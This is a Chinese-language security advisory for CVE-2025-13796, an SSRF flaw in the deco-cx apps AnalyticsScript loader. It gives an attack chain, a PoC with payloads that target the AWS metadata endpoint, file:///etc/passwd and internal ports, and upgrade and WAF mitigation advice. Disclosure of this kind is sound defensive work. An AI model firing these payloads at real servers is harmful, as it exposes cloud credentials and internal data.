CVE-2025-13796 | deco-cx apps 服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-13796

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

deco-cx/apps

漏洞概述

CVE-2025-13796是deco-cx应用中的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞存在于deco-cx apps 0.120.1及之前版本中，攻击者可利用AnalyticsScript函数（位于website/loaders/analyticsScript.ts文件）在Parameter Handler组件中通过操控url参数，强制服务器向任意内部或外部资源发起请求。由于该漏洞可远程利用且无需高权限认证，攻击者可以利用此漏洞探测内网服务、访问内部敏感资源、读取本地文件或对内部系统发起进一步攻击。此漏洞已被公开披露且可能已被实际利用，建议受影响用户尽快升级到修复版本0.120.2。

技术细节

该SSRF漏洞源于deco-cx apps的AnalyticsScript加载器函数对用户可控的url参数缺乏充分的验证和过滤。攻击者可以通过构造恶意的URL参数值，诱使服务器向内部网络地址（如localhost、127.0.0.1、内部IP段）或任意外部URL发起HTTP请求。漏洞文件位置为website/loaders/analyticsScript.ts，受影响的组件为Parameter Handler。由于服务器端会执行这些请求，攻击者可以获取服务器响应内容，包括内部服务返回的敏感数据、配置信息等。漏洞利用无需特殊认证，攻击者只需拥有低权限账户或通过API接口即可触发问题函数。修复版本0.120.2对url参数进行了严格的输入验证和URL白名单限制。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站上运行的使用deco-cx apps构建的应用

STEP 2

步骤2

攻击者定位到AnalyticsScript加载器接口（website/loaders/analyticsScript.ts）

STEP 3

步骤3

攻击者构造包含恶意URL的请求，注入到url参数中（如内网IP、file://协议、AWS元数据端点等）

STEP 4

步骤4

目标服务器解析请求后，由AnalyticsScript函数发起对攻击者指定URL的请求

STEP 5

步骤5

服务器将请求结果（内部服务响应、敏感文件内容等）返回给攻击者

STEP 6

步骤6

攻击者利用获取的信息进行进一步渗透攻击，如横向移动或数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13796 SSRF PoC for deco-cx apps
// Target: deco-cx apps <= 0.120.1
// Attack vector: Manipulating url parameter in AnalyticsScript

// Example 1: Internal port scanning via SSRF
const ssrfPayload1 = {
  url: 'http://127.0.0.1:22'  // SSH port detection
};

// Example 2: Access internal metadata service
const ssrfPayload2 = {
  url: 'http://169.254.169.254/latest/meta-data/'  // AWS metadata
};

// Example 3: Read local files via file:// protocol
const ssrfPayload3 = {
  url: 'file:///etc/passwd'  // Local file access
};

// Example 4: Internal service fingerprinting
const ssrfPayload4 = {
  url: 'http://10.0.0.1:8080/admin'  // Internal admin panel
};

// Exploit request example (assuming AnalyticsScript endpoint)
async function exploitSSRF(targetUrl, maliciousUrl) {
  const response = await fetch(`${targetUrl}/api/analytics-script?url=${encodeURIComponent(maliciousUrl)}`);
  return await response.text();
}

// Usage:
// await exploitSSRF('https://vulnerable-deco-site.com', 'http://127.0.0.1:6379');

影响范围

deco-cx/apps < 0.120.2

防御指南

临时缓解措施

立即将deco-cx/apps升级到0.120.2版本以修复此SSRF漏洞。在升级前，可通过配置Web应用防火墙（WAF）规则限制对AnalyticsScript接口的访问，并对url参数进行过滤，阻止内网IP段（如10.x.x.x、172.16.x.x、192.168.x.x、127.0.0.1）和危险协议（file://、dict://）的使用。同时监控出站流量，及时发现异常的服务器请求行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13796
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13796
3 Details https://www.cvedetails.com/cve/CVE-2025-13796/
4 VulDB https://vuldb.com/cve/CVE-2025-13796
5 Link https://github.com/deco-cx/apps/pull/1360
6 Link https://github.com/deco-cx/apps/releases/tag/0.120.2
7 Link https://vuldb.com/?ctiid.333807
8 Link https://vuldb.com/?id.333807
9 Link https://vuldb.com/?submit.691837